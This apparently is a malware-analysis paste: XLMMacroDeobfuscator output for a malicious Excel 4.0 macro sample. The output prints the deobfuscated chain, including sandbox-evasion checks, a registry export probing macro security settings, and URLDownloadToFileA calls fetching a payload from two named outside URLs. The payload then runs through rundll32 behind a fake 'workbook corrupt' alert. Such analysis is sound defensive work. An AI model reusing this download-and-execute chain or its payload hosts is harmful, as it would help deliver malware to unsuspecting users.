dissectmalware

example - deobfuscated

May 26th, 2020
  1. C:\Users\user\AppData\Local\Programs\Python\Python36-32\python.exe C:/Users/user/Downloads/last/XLMMacroDeobfuscator_new/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\d42c62adb7559c60809dfa51d53e64b6a0a400408afbf3aef8fd7bde2367ef1c
  2.  
  3. _ _______
  4. |\ /|( \ ( )
  5. ( \ / )| ( | () () |
  6. \ (_) / | | | || || |
  7. ) _ ( | | | |(_)| |
  8. / ( ) \ | | | | | |
  9. ( / \ )| (____/\| ) ( |
  10. |/ \|(_______/|/ \|
  11. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  12. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  13. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  14. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  15. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  16. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  17. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  18. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  19.  
  20.  
  21. XLMMacroDeobfuscator(v 0.1.4) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  22.  
  23. File: C:\Users\user\Downloads\d42c62adb7559c60809dfa51d53e64b6a0a400408afbf3aef8fd7bde2367ef1c
  24.  
  25. [Loading Cells]
  26. auto_open: auto_openxp6og->tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!$CS$23836
  27. [Starting Deobfuscation]
  28. CELL:CS23836 , FullEvaluation , FORMULA(26,FW19305)
  29. CELL:CS23837 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AI46959)
  30. CELL:AI46959 , FullEvaluation , FORMULA(-368,ED10392)
  31. CELL:AI46960 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IM26282)
  32. CELL:IM26282 , FullEvaluation , FORMULA(-301,EG8350)
  33. CELL:IM26283 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HD24619)
  34. CELL:HD24619 , FullEvaluation , FORMULA(648,FU10914)
  35. CELL:HD24620 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DV49385)
  36. CELL:DV49385 , FullEvaluation , FORMULA(638.4,W48406)
  37. CELL:DV49386 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IJ54262)
  38. CELL:IJ54262 , FullEvaluation , FORMULA(47,AD21470)
  39. CELL:IJ54263 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AQ28036)
  40. CELL:AQ28036 , FullEvaluation , FORMULA(-436,BQ37930)
  41. CELL:AQ28037 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AU15874)
  42. CELL:AU15874 , FullEvaluation , FORMULA(-117,BL21938)
  43. CELL:AU15875 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BM56647)
  44. CELL:BM56647 , FullEvaluation , FORMULA(-190,IS58563)
  45. CELL:BM56648 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GH13183)
  46. CELL:GH13183 , FullEvaluation , FORMULA(216,FH48629)
  47. CELL:GH13184 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EN65022)
  48. CELL:EN65022 , FullEvaluation , FORMULA(-88,BO51056)
  49. CELL:EN65023 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HI20419)
  50. CELL:HI20419 , FullEvaluation , FORMULA(-268,AM7352)
  51. CELL:HI20420 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IT33849)
  52. CELL:IT33849 , FullEvaluation , FORMULA(-28,IK31173)
  53. CELL:IT33850 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HX33694)
  54. CELL:HX33694 , FullEvaluation , FORMULA(336,FD63424)
  55. CELL:HX33695 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IE30187)
  56. CELL:IE30187 , FullEvaluation , FORMULA(467,CI151)
  57. CELL:IE30188 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!P25229)
  58. CELL:P25229 , FullEvaluation , FORMULA(-255,B22727)
  59. CELL:P25230 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BI16974)
  60. CELL:BI16974 , FullEvaluation , FORMULA(306.25,DE61562)
  61. CELL:BI16975 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BV36285)
  62. CELL:BV36285 , FullEvaluation , FORMULA(-134,CO58518)
  63. CELL:BV36286 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!ER25619)
  64. CELL:ER25619 , FullEvaluation , FORMULA(-425,GR31095)
  65. CELL:ER25620 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!ER915)
  66. CELL:ER915 , FullEvaluation , FORMULA(-1487.5,GT50980)
  67. CELL:ER916 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DP31417)
  68. CELL:DP31417 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",BS5069)
  69. CELL:DP31418 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!ES64418)
  70. CELL:ES64418 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",FU20485)
  71. CELL:ES64419 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FR29556)
  72. CELL:FR29556 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",CI55856)
  73. CELL:FR29557 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BX28478)
  74. CELL:BX28478 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",Y2223)
  75. CELL:BX28479 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GX30254)
  76. CELL:GX30254 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)",EM52673)
  77. CELL:GX30255 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IT24175)
  78. CELL:IT24175 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)",AB46814)
  79. CELL:IT24176 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HF59100)
  80. CELL:HF59100 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,CLOSE(TRUE))",GP56392)
  81. CELL:HF59101 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DS12421)
  82. CELL:DS12421 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,CLOSE(TRUE))",AR61812)
  83. CELL:DS12422 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IR45905)
  84. CELL:IR45905 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,CLOSE(TRUE))",AV30811)
  85. CELL:IR45906 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GM39944)
  86. CELL:GM39944 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",DB2735)
  87. CELL:GM39945 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FQ5201)
  88. CELL:FQ5201 , FullEvaluation , FORMULA("=""C:\Users\Public\ziZqqH.reg""",DX8859)
  89. CELL:FQ5202 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BI51976)
  90. CELL:BI51976 , FullEvaluation , FORMULA("=R[2345]C[97]&GET.WORKSPACE(2)&""\Excel\Security ""&R[8469]C[119]&"" /y""",I390)
  91. CELL:BI51977 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!K17837)
  92. CELL:K17837 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",FR11386)
  93. CELL:K17838 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!J48104)
  94. CELL:J48104 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-11476]C[52],R[-22472]C[-113],0,5)",DR22862)
  95. CELL:J48105 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EZ12513)
  96. CELL:EZ12513 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[-18644]C[104])))",X27503)
  97. CELL:EZ12514 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EW11228)
  98. CELL:EW11228 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",X27504)
  99. CELL:EW11229 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FY9357)
  100. CELL:FY9357 , FullEvaluation , FORMULA("=NEXT()",X27505)
  101. CELL:FY9358 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!CP4135)
  102. CELL:CP4135 , FullEvaluation , FORMULA("=""http://theislandmen.com/wp-smart.php""",HX58157)
  103. CELL:CP4136 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AT21116)
  104. CELL:AT21116 , FullEvaluation , FORMULA("=""http://shetkarimarket.com/wp-snapshots/tmp/wp-smart.php""",BM58324)
  105. CELL:AT21117 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!CN34881)
  106. CELL:CN34881 , FullEvaluation , FORMULA("=FOPEN(R[-46897]C[-36])",FH55756)
  107. CELL:CN34882 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HG32718)
  108. CELL:HG32718 , FullEvaluation , FORMULA("=FPOS(R[35378]C[48],215)",DL20378)
  109. CELL:HG32719 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HJ24458)
  110. CELL:HJ24458 , FullEvaluation , FORMULA("=FREAD(R[27967]C[-61],255)",HQ27789)
  111. CELL:HJ24459 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HI43987)
  112. CELL:HI43987 , FullEvaluation , FORMULA("=FCLOSE(R[5666]C[89])",BW50090)
  113. CELL:HI43988 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!T25103)
  114. CELL:T25103 , FullEvaluation , FORMULA("=FILE.DELETE(R[-41985]C[-81])",HA50844)
  115. CELL:T25104 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FE48429)
  116. CELL:FE48429 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[-6267]C[186])),CLOSE(FALSE),)",AM34056)
  117. CELL:FE48430 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BB19811)
  118. CELL:BB19811 , FullEvaluation , FORMULA("=""C:\Users\Public\NqSfY7Fd.html""",AR22886)
  119. CELL:BB19812 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!N57229)
  120. CELL:N57229 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[50489]C[35],R[17519]C[-8],0,0)",AZ5367)
  121. CELL:N57230 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GL59066)
  122. CELL:GL59066 , FullEvaluation , FORMULA("=FILES(R[-11938]C[-94])",EH34824)
  123. CELL:GL59067 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FJ46055)
  124. CELL:FJ46055 , FullEvaluation , FORMULA("=IF(ISERROR(R[-27988]C[91]),CLOSE(FALSE),)",AU62812)
  125. CELL:FJ46056 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IS17943)
  126. CELL:IS17943 , FullEvaluation , FORMULA("=""C:\Users\Public\gGCUNF.html""",F60085)
  127. CELL:IS17944 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FL45824)
  128. CELL:FL45824 , FullEvaluation , FORMULA("=R[24675]C[-102]&"",DllRegisterServer""",DD35410)
  129. CELL:FL45825 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AS4957)
  130. CELL:AS4957 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[9307]C[66],R[11235]C[-160],0,0)",FJ48850)
  131. CELL:AS4958 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EL13627)
  132. CELL:EL13627 , FullEvaluation , FORMULA("=FILES(R[-1444]C[-97])",CY61529)
  133. CELL:EL13628 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AX22261)
  134. CELL:AX22261 , FullEvaluation , FORMULA("=IF(ISERROR(R[45285]C[82]),,RUN(R[-12028]C[59]))",U16244)
  135. CELL:AX22262 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EI25186)
  136. CELL:EI25186 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[30088]C[-70],R[31849]C[-129],0,0)",EE28236)
  137. CELL:EI25187 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FS37429)
  138. CELL:FS37429 , FullEvaluation , FORMULA("=ALERT(R[853]C[-9],2)",CB4216)
  139. CELL:FS37430 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DJ33074)
  140. CELL:DJ33074 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-40976]C[-14],R[-26051]C[-83],0,5)",GI61461)
  141. CELL:DJ33075 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!R26591)
  142. CELL:R26591 , FullEvaluation , FORMULA("=CLOSE(FALSE)",ER20868)
  143. CELL:R26592 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BS5069)
  144. CELL:BS5069 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  145. CELL:BS5070 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FU20485)
  146. CELL:FU20485 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  147. CELL:FU20486 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!CI55856)
  148. CELL:CI55856 , FullEvaluation , "https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates"
  149. CELL:CI55857 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!Y2223)
  150. CELL:Y2223 , PartialEvaluation , APP.MAXIMIZE()
  151. CELL:Y2224 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EM52673)
  152. CELL:EM52673 , FullEvaluation , IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
  153. CELL:EM52674 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AB46814)
  154. CELL:AB46814 , FullEvaluation , IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)
  155. CELL:AB46815 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GP56392)
  156. CELL:GP56392 , FullEvaluation , IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  157. CELL:GP56393 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AR61812)
  158. CELL:AR61812 , FullEvaluation , IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  159. CELL:AR61813 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AV30811)
  160. CELL:AV30811 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
  161. CELL:AV30811 , FullEvaluation , [TRUE]
  162. CELL:AV30812 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DB2735)
  163. CELL:DB2735 , FullEvaluation , "EXPORT HKCU\Software\Microsoft\Office\"
  164. CELL:DB2736 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DX8859)
  165. CELL:DX8859 , FullEvaluation , "C:\Users\Public\ziZqqH.reg"
  166. CELL:DX8860 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!I390)
  167. CELL:I390 , FullEvaluation , "EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security C:\Users\Public\ziZqqH.reg /y"
  168. CELL:I391 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FR11386)
  169. CELL:FR11386 , FullEvaluation , "C:\Windows\system32\reg.exe"
  170. CELL:FR11387 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DR22862)
  171. CELL:DR22862 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security C:\Users\Public\ziZqqH.reg /y",0,5)
  172. CELL:DR22863 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!X27503)
  173. CELL:X27503 , PartialEvaluation , WHILE(ISERROR(FILES(R[-18644]C[104])))
  174. CELL:X27506 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HX58157)
  175. CELL:HX58157 , FullEvaluation , "http://theislandmen.com/wp-smart.php"
  176. CELL:HX58158 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BM58324)
  177. CELL:BM58324 , FullEvaluation , "http://shetkarimarket.com/wp-snapshots/tmp/wp-smart.php"
  178. CELL:BM58325 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FH55756)
  179. CELL:FH55756 , PartialEvaluation , FOPEN("C:\Users\Public\ziZqqH.reg")
  180. CELL:FH55757 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DL20378)
  181. CELL:DL20378 , PartialEvaluation , FPOS("FOPEN(""C:\Users\Public\ziZqqH.reg"")",215)
  182. CELL:DL20379 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HQ27789)
  183. CELL:HQ27789 , PartialEvaluation , FREAD("FOPEN(""C:\Users\Public\ziZqqH.reg"")",255)
  184. CELL:HQ27790 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BW50090)
  185. CELL:BW50090 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\ziZqqH.reg"")")
  186. CELL:BW50091 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HA50844)
  187. CELL:HA50844 , PartialEvaluation , FILE.DELETE("C:\Users\Public\ziZqqH.reg")
  188. CELL:HA50845 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AM34056)
  189. CELL:AM34056 , FullBranching , IF(ISNUMBER(SEARCH("0001",R[-6267]C[186])),CLOSE(FALSE),)
  190. CELL:AM34056 , End , [TRUE] CLOSE(FALSE)
  191. CELL:AM34056 , FullEvaluation , [FALSE]
  192. CELL:AM34057 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AR22886)
  193. CELL:AR22886 , FullEvaluation , "C:\Users\Public\NqSfY7Fd.html"
  194. CELL:AR22887 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AZ5367)
  195. CELL:AZ5367 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\NqSfY7Fd.html",0,0)
  196. CELL:AZ5368 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EH34824)
  197. CELL:EH34824 , PartialEvaluation , FILES("C:\Users\Public\NqSfY7Fd.html")
  198. CELL:EH34825 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AU62812)
  199. CELL:AU62812 , FullBranching , IF(ISERROR(R[-27988]C[91]),CLOSE(FALSE),)
  200. CELL:AU62812 , End , [TRUE] CLOSE(FALSE)
  201. CELL:AU62812 , FullEvaluation , [FALSE]
  202. CELL:AU62813 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!F60085)
  203. CELL:F60085 , FullEvaluation , "C:\Users\Public\gGCUNF.html"
  204. CELL:F60086 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DD35410)
  205. CELL:DD35410 , FullEvaluation , "C:\Users\Public\gGCUNF.html,DllRegisterServer"
  206. CELL:DD35411 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FJ48850)
  207. CELL:FJ48850 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://theislandmen.com/wp-smart.php","C:\Users\Public\gGCUNF.html",0,0)
  208. CELL:FJ48851 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!CY61529)
  209. CELL:CY61529 , PartialEvaluation , FILES("C:\Users\Public\gGCUNF.html")
  210. CELL:CY61530 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!U16244)
  211. CELL:U16244 , FullBranching , IF(ISERROR(R[45285]C[82]),,RUN(R[-12028]C[59]))
  212. CELL:U16244 , FullEvaluation , [TRUE]
  213. CELL:U16245 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EE28236)
  214. CELL:EE28236 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://shetkarimarket.com/wp-snapshots/tmp/wp-smart.php","C:\Users\Public\gGCUNF.html",0,0)
  215. CELL:EE28237 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!CB4216)
  216. CELL:CB4216 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  217. CELL:CB4217 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GI61461)
  218. CELL:GI61461 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\gGCUNF.html,DllRegisterServer",0,5)
  219. CELL:GI61462 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!ER20868)
  220. CELL:ER20868 , End , CLOSE(FALSE)
  221. CELL:U16244 , FullEvaluation , [FALSE] RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!CB4216)
  222. CELL:CB4216 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  223. CELL:CB4217 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GI61461)
  224. CELL:GI61461 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\gGCUNF.html,DllRegisterServer",0,5)
  225. CELL:GI61462 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!ER20868)
  226. CELL:ER20868 , End , CLOSE(FALSE)
  227. CELL:AV30811 , End , [FALSE] CLOSE(TRUE)
  228. [Day of Month] 4
  229. [END of Deobfuscation]
  230. time elapsed: 2.736368179321289
  231.  
  232. Process finished with exit code 0